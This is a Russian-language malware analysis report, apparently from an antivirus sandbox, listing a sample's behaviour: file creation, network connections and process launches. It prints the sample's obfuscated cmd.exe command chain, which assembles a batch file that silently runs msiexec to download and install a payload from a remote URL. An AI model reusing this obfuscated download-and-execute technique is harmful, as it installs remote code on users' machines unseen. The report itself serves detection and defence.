Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /c EChO|SE^t /p=" M^siexe">%temp%\alpaca.bat&EcHo|s^et /p="c " >>%temp%\alpaca.bat&EcHo|s^et /p="^/i" >>%temp%\alpaca.bat&EcHo|s^et /p=" http^:^/^/^www^.blackbox.live/^ui^.php ">>%temp%\alp...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1944
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\alpaca.bat
- %TEMP%\1068466.cvr
Сетевая активность
Подключается к
- 'bl###box.live':80
- 'bl###box.live':443
TCP
Запросы HTTP GET
- http://www.bl###box.live/ui.php
Другие
- 'bl###box.live':443
UDP
- DNS ASK bl###box.live
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c EChO|SE^t /p=" M^siexe">%temp%\alpaca.bat&EcHo|s^et /p="c " >>%temp%\alpaca.bat&EcHo|s^et /p="^/i" >>%temp%\alpaca.bat&EcHo|s^et /p=" http^:^/^/^www^.blackbox.live/^ui^.php ">>%temp%\alp...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /S /D /c" EChO"
- '<SYSTEM32>\cmd.exe' /S /D /c" SEt /p=" M^siexe" 1>%TEMP%\alpaca.bat"
- '<SYSTEM32>\cmd.exe' /S /D /c" set /p="c " 1>>%TEMP%\alpaca.bat"
- '<SYSTEM32>\cmd.exe' /S /D /c" set /p="^/i" 1>>%TEMP%\alpaca.bat"
- '<SYSTEM32>\cmd.exe' /S /D /c" set /p=" http^:^/^/^www^.blackbox.live/^ui^.php " 1>>%TEMP%\alpaca.bat"
- '<SYSTEM32>\cmd.exe' /S /D /c" set /p=" ^/q &exit" 1>>%TEMP%\alpaca.bat"
- '<SYSTEM32>\msiexec.exe' /ihttp://www.blackbox.live/ui.php /q
